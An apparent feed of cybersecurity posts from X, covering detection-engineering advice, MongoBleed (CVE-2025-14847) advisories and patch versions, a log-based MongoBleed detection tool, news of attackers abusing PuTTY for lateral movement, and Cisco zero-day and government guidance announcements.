🛡️ Detection Engineering Tip A good detection should answer: 1️⃣ What attacker behavior am I detecting? 2️⃣ What ATT&CK technique maps to it? 3️⃣ How can an attacker evade it? 4️⃣ What telemetry validates it? Detection logic > Query syntax. #DetectionEngineering #ThreatHunting

🚀 Back on X. I'm CSIRT L3 Detection Analyst securing IT & OT environments. Looking to connect with fellow cybersecurity professionals, researchers, and defenders. Let's learn, share, & grow together. 🤝 #CyberSecurity #ITSecurity #OTSecurity #SOC #ThreatHunting #DFIR #CSIRT

WAF Bypass Discovered - Akamai & Cloudflare : 🙌🏻 A fresh technique has been spotted that successfully bypasses WAFs like Akamai and Cloudflare. #infosec #cybersec #bugbountytips

I wrote a Tool to detect MongoBleed exploitation in MongoDB logs 🩸 The detection logic is based on @eric_capuano's excellent research: the exploit makes thousands of connections but never sends client metadata. Legit drivers always do. github.com/Neo23x0/mongoblee… Features: - Pure bash/jq/awk - no agents, runs via SSH or on forensic copies - Streams large logs without loading into memory - Handles compressed .gz rotated logs - IPv4 & IPv6 support - Configurable thresholds - Risk levels: HIGH/MEDIUM/LOW/INFO - a Python based wrapper that takes a host list as an input and runs the script on a set of remote systems The sub folder ./example-logs contains a Mongod.log of an exploited system

MongoBleed (CVE-2025-14847) is basically Heartbleed for MongoDB - unauthenticated memory disclosure - public POC, trivial to exploit - leaks creds, tokens, cloud keys straight from RAM - huge exposed surface on the internet Good writeups and technical details here: doublepulsar.com/merry-chris… ox.security/blog/attackers-c… blog.ecapuano.com/p/hunting-… Patch fast, rotate secrets, and assume exposed instances were scanned(!)

🚨A critical vulnerability in MongoDB (CVE-2025-14847) allows unauthenticated attackers to remotely leak sensitive data from MongoDB server memory. A MongoDB honeypot intel stream has been now added into Defused TF and is available for subscription 🍯 👉console.defusedcyber.com/sig…

🚨 MongoBleed (CVE-2025-14847) MongoDB w/ zlib enabled (default) may leak uninitialized heap memory to unauthenticated attackers, risking credentials & tokens. 📌 Censys sees 87K potentially vulnerable instances. ✅ Patch: 8.2.3 , 8.0.17 , 7.0.28 , 6.0.27 , 5.0.32 , 4.4.30 🔗 hubs.ly/Q03Z4_GS0 #MongoDB #CVE202514847

🚨 Hackers Using PuTTY for Both Lateral Movement and Data Exfiltration Source: cybersecuritynews.com/putty-… Hackers are increasingly abusing the popular PuTTY SSH client for stealthy lateral movement and data exfiltration in compromised networks, leaving subtle forensic traces that investigators can exploit. Threat actors favor PuTTY, a legitimate tool for secure remote access, due to its “living off the land” nature, blending malicious activity with normal admin tasks. Attackers execute PuTTY binaries like plink.exe or pscp.exe to hop between systems via SSH tunnels and siphon sensitive files without deploying custom malware. #cybersecuritynews

🏛️🧠 Strong governance is key to cyber resilience. Our updated Cross-Sector Cybersecurity Performance Goals now include a governance component—emphasizing leadership accountability, risk management, & integration of #cybersecurity in operations. More info: cisa.gov/cross-sector-cybers…

Cyber AI Profile - nvlpubs.nist.gov/nistpubs/ir… by @NIST NIST’s preliminary draft Cyber AI Profile can help organizations strategically adopt AI while addressing and prioritizing cybersecurity risks stemming from its advancements. The Cyber AI Profile addresses the following Focus Areas: - Securing AI System Components (Secure) - Conducting AI-Enabled Cyber Defense (Defend) - Thwarting AI-enabled Cyber Attacks (Thwart) Authors: @KonnectedKat, Barbara Cuthill, Marissa Dotter, Michael Garris, Ishika Khemani, Bronwyn Patrick, Noah Schiro, Julie Nethery Snyder, Mohammad Zarei – @NIST, @NISTcyber, @MITREcorp

🛑 WARNING: CVE-2025-20393 is rated 10.0, with no patch available. Cisco confirmed active exploitation of an AsyncOS zero-day by a China-linked APT. The flaw allows root-level command execution on affected email security appliances and enables attackers to establish persistence. 🔗 Details and mitigations → thehackernews.com/2025/12/ci…

🚨 Cyber threat actors are exploiting newly identified zero-day vulnerabilities in Cisco Adaptive Security Appliances via web services, posing significant risk. Federal agencies must act immediately and follow the guidance in Emergency Directive 25-03. 🔗 go.dhs.gov/iAK